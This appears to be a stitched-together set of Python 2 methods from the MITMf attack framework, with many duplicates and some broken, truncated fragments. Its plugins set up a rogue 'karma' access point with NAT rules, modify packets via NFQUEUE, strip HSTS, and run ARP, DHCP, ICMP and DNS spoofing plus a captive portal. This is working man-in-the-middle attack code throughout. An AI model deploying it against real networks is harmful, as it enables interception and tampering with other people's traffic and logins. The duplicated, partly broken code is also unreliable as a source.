def on_shutdown(self):
'''This will be called when shutting down'''
from core.utils import iptables
iptables().flush()
#FIXME: add forwarding rules if we are an access point
pass
def _initialize_nat_simple(self):
from core.utils import iptables, NetworkManager, set_ip_forwarding
from core.hostapd_mana import HostAPDMana, DHCPDMana
hostapd = HostAPDMana.get_instance()
network_manager = NetworkManager.get_instance()
dhcpd = DHCPDMana.get_instance()
os.system('killall dnsmasq')
network_manager.stop()
os.system('rfkill unblock wlan')
os.system('ifconfig %s up' % self.phy)
hostapd.configure_karma(phy=self.phy,
essid=self.essid,
bssid=self.bssid,
channel=self.channel)
#hostapd.start()
time.sleep(5)
os.system('ifconfig %s 10.0.0.1 netmask 255.255.255.0' % self.phy)
os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
dhcpd.select_conf('dhcpd.conf')
#dhcpd.start(self.phy)
set_ip_forwarding(1)
print 'setting up iptables'
iptables().ROGUE_AP_NAT(upstream=self.upstream, phy=self.phy)
if not iptables().http and self.options.filter is None:
iptables().HTTP(self.options.listen_port)
def _initialize_nat_simple(self):
from core.utils import iptables, NetworkManager, set_ip_forwarding
from core.hostapd_mana import HostAPDMana, DHCPDMana
hostapd = HostAPDMana.get_instance()
network_manager = NetworkManager.get_instance()
dhcpd = DHCPDMana.get_instance()
os.system('killall dnsmasq')
network_manager.stop()
os.system('rfkill unblock wlan')
os.system('ifconfig %s up' % self.phy)
hostapd.configure_karma(phy=self.phy,
essid=self.essid,
bssid=self.bssid,
channel=self.channel)
#hostapd.start()
time.sleep(5)
os.system('ifconfig %s 10.0.0.1 netmask 255.255.255.0' % self.phy)
os.system('route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
dhcpd.select_conf('dhcpd.conf')
#dhcpd.start(self.phy)
set_ip_forwarding(1)
print 'setting up iptables'
iptables().ROGUE_AP_NAT(upstream=self.upstream, phy=self.phy)
if not iptables().http and self.options.filter is None:
iptables().HTTP(self.options.listen_port)
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
self.nfqueue.run()
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(0, self.modify)
self.nfqueue.run()
def on_shutdown(self):
from core.utils import iptables, set_ip_forwarding
for protocol in self.protocol_instances:
if hasattr(protocol, 'stop'):
protocol.stop()
iptables().flush()
set_ip_forwarding(0)
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
t.setDaemon(True)
t.start()
def on_shutdown(self):
from core.utils import iptables, set_ip_forwarding
for protocol in self.protocol_instances:
if hasattr(protocol, 'stop'):
protocol.stop()
iptables().flush()
set_ip_forwarding(0)
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE()
self.nfqueue = NetfilterQueue()
self.nfqueue.bind(1, self.modify)
t = threading.Thread(name='packetparser', target=self.nfqueue.run)
t.setDaemon(True)
t.start()
def initialize(self, options):
self.options = options
from core.sslstrip.URLMonitor import URLMonitor
from core.servers.DNS import DNSChef
from core.utils import iptables
if iptables().dns is False:
iptables().DNS(self.config['MITMf']['DNS']['port'])
URLMonitor.getInstance().setHstsBypass()
DNSChef().setHstsBypass()
def initialize(self, options):
self.options = options
from core.sslstrip.URLMonitor import URLMonitor
from core.servers.DNS import DNSChef
from core.utils import iptables
if iptables().dns is False:
iptables().DNS(self.config['MITMf']['DNS']['port'])
URLMonitor.getInstance().setHstsBypass()
DNSChef().setHstsBypass()
def start(self):
set_ip_forwarding(1)
iptables().NFQUEUE(self.mode)
self.q = nfqueue.queue()
self.q.open()
self.q.bind(socket.AF_INET)
self.q.set_callback(self.modify)
self.q.create_queue(0)
while True:
self.q.try_run()
print("stopped")
def on_shutdown(self):
from core.utils import iptables
from core.hostapd_mana import HostAPDMana, DHCPDMana
hostapd = HostAPDMana.get_instance()
_iptables = iptables()
dhcpd = DHCPDMana.get_instance()
_iptables.flush()
hostapd.stop()
dhcpd.stop()
def on_shutdown(self):
from core.utils import iptables
from core.hostapd_mana import HostAPDMana, DHCPDMana
hostapd = HostAPDMana.get_instance()
_iptables = iptables()
dhcpd = DHCPDMana.get_instance()
_iptables.flush()
hostapd.stop()
dhcpd.stop()
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.protocol_instances = []
from core.utils import iptables, shutdown, set_ip_forwarding
#Makes scapy more verbose
debug = False
if options.arp:
if not options.gateway:
shutdown("[Spoof] --arp argument requires --gateway")
from core.poisoners.ARP import ARPpoisoner
arp = ARPpoisoner(options)
arp.debug = debug
self.tree_info.append('ARP spoofing enabled')
self.protocol_instances.append(arp)
elif options.dhcp:
from core.poisoners.DHCP import DHCPpoisoner
if options.targets:
shutdown("[Spoof] --targets argument invalid when DCHP spoofing")
dhcp = DHCPpoisoner(options)
dhcp.debug = debug
self.tree_info.append('DHCP spoofing enabled')
self.protocol_instances.append(dhcp)
elif options.icmp:
from core.poisoners.ICMP import ICMPpoisoner
if not options.gateway:
shutdown("[Spoof] --icmp argument requires --gateway")
if not options.targets:
shutdown("[Spoof] --icmp argument requires --targets")
icmp = ICMPpoisoner(options)
icmp.debug = debug
self.tree_info.append('ICMP spoofing enabled')
self.protocol_instances.append(icmp)
if options.dns:
self.tree_info.append('DNS spoofing enabled')
if iptables().dns is False and options.filter is None:
iptables().DNS(self.config['MITMf']['DNS']['port'])
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
shutdown("[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
set_ip_forwarding(1)
if iptables().http is False and options.filter is None:
iptables().HTTP(options.listen_port)
for protocol in self.protocol_instances:
protocol.start()
def stop(self):
self.q.unbind(socket.AF_INET)
self.q.close()
set_ip_forwarding(0)
iptables().flush()
sys.exit('closing...')
def on_shutdown(self):
from core.utils import iptables
if iptables().dns is True:
iptables().flush()
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.protocol_instances = []
from core.utils import iptables, shutdown, set_ip_forwarding
#Makes scapy more verbose
debug = False
if options.arp:
if not options.gateway:
shutdown("[Spoof] --arp argument requires --gateway")
from core.poisoners.ARP import ARPpoisoner
arp = ARPpoisoner(options)
arp.debug = debug
self.tree_info.append('ARP spoofing enabled')
self.protocol_instances.append(arp)
elif options.dhcp:
from core.poisoners.DHCP import DHCPpoisoner
if options.targets:
shutdown(
"[Spoof] --targets argument invalid when DCHP spoofing")
dhcp = DHCPpoisoner(options)
dhcp.debug = debug
self.tree_info.append('DHCP spoofing enabled')
self.protocol_instances.append(dhcp)
elif options.icmp:
from core.poisoners.ICMP import ICMPpoisoner
if not options.gateway:
shutdown("[Spoof] --icmp argument requires --gateway")
if not options.targets:
shutdown("[Spoof] --icmp argument requires --targets")
icmp = ICMPpoisoner(options)
icmp.debug = debug
self.tree_info.append('ICMP spoofing enabled')
self.protocol_instances.append(icmp)
if options.dns:
self.tree_info.append('DNS spoofing enabled')
if iptables().dns is False:
iptables().DNS(self.config['MITMf']['DNS']['port'])
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
shutdown(
"[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
set_ip_forwarding(1)
if iptables().http is False:
iptables().HTTP(options.listen_port)
for protocol in self.protocol_instances:
protocol.start()
def on_shutdown(self):
from core.utils import iptables
if iptables().dns is True:
iptables().flush()
def on_shutdown(self):
'''This will be called when shutting down'''
from core.utils import iptables
iptables().flush()
pass
def stop(self):
self.nfqueue.unbind()
set_ip_forwarding(0)
iptables().flush()
try:
self.portal_ip = socket.gethostbyname(self.portal_url.hostname) #TODO: better method, scapy?
except socket.gaierror, e:
sys.exit("[-] Portal cannot resolve hostname: {}".format(e))
if options.portaldns:
#TODO: if options.portaldns
t2 = threading.Thread(name='captive_dns_thread', target=self.captive_dns, args=(self.mon_interface,))
t2.setDaemon(True)
t2.start()
else:
sys.exit("[-] Portal requires portal url or portal template")
#running on an access point
from core.utils import iptables
if iptables().http is False and options.filter is None:
iptables().HTTP(options.listen_port)
#Setup iptables to block all not allowed traffic
self._block_traffic()
def parse_template(self, path):
if os.path.exists(path): # replace whole content
f = open(path, 'r')
data = f.read()
f.close()
return data
else:
sys.exit("[-] Error reading template file {}".format(path))
def options(self, options):
sys.exit("[-] Error parsing portal url: %s" % e)
# get portal url ip address
self.portal_ip = socket.gethostbyname('google.com') #TODO: better method, scapy?
if options.portaldns:
#TODO: if options.portaldns
t2 = threading.Thread(name='captive_dns_thread', target=self.captive_dns, args=(self.mon_interface,))
t2.setDaemon(True)
t2.start()
else:
sys.exit("[-] DNS records require portal url or portal template: %s" % e)
#running on an access point
from core.utils import iptables
if iptables().http is False and options.filter is None:
iptables().HTTP(options.listen_port)
#Setup iptables to block all not allowed traffic
self._block_traffic()
def parse_template(self, path):
if os.path.exists(path): # replace whole content
f = open(path, 'r')
data = f.read()
f.close()
return data
else:
sys.exit("[-] Error reading template file {}".format(path))
def options(self, options):
